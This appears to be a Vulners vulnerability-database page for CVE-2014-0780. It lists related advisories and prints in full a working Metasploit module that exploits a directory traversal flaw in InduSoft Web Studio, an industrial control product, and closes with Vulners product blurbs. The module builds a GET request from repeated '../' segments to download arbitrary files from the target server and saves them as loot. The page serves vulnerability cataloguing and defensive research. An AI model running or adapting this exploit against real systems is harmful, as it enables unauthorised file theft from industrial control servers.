| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Indusoft Web Studio - Directory Traversal Information Disclosure Exploit | 13 Sep 201700:00 | ā | zdt | |
| InduSoft Web Studio NTWebServer < v7.1 + SP2 + P4 Directory Traversal Vulnerability | 14 May 201400:00 | ā | nessus | |
| CVE-2014-0780 | 25 Apr 201400:00 | ā | attackerkb | |
| CVE-2014-0780 | 14 Jun 202321:10 | ā | circl | |
| InduSoft Web Studio NTWebServer Directory Traversal Vulnerability | 15 Apr 202200:00 | ā | cisa_kev | |
| InduSoft Web Studio Directory Traversal (CVE-2014-0780) | 14 May 201400:00 | ā | checkpoint_advisories | |
| CVE-2014-0780 | 25 Apr 201401:00 | ā | cve | |
| CVE-2014-0780 InduSoft Web Studio Path Traversal | 25 Apr 201401:00 | ā | cvelist | |
| Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit) | 13 Sep 201700:00 | ā | exploitpack | |
| InduSoft Web Studio Directory Traversal Vulnerability | 18 Jan 201407:00 | ā | ics |
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Indusoft Web Studio Directory Traversal',
'Description' => %q{
This module exploits a flaw found in Indusoft Web Studio
<= 7.1 before SP2 Patch 4. This specific flaw allows users
to browse outside of the webroot to download files found
on the underlying system
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2014-0780' ],
[ 'ZDI', '14-118/' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
],
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "/" + levels + datastore['FILE'],
})
if res and res.code == 200 and res.message =~ /Sending file/
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation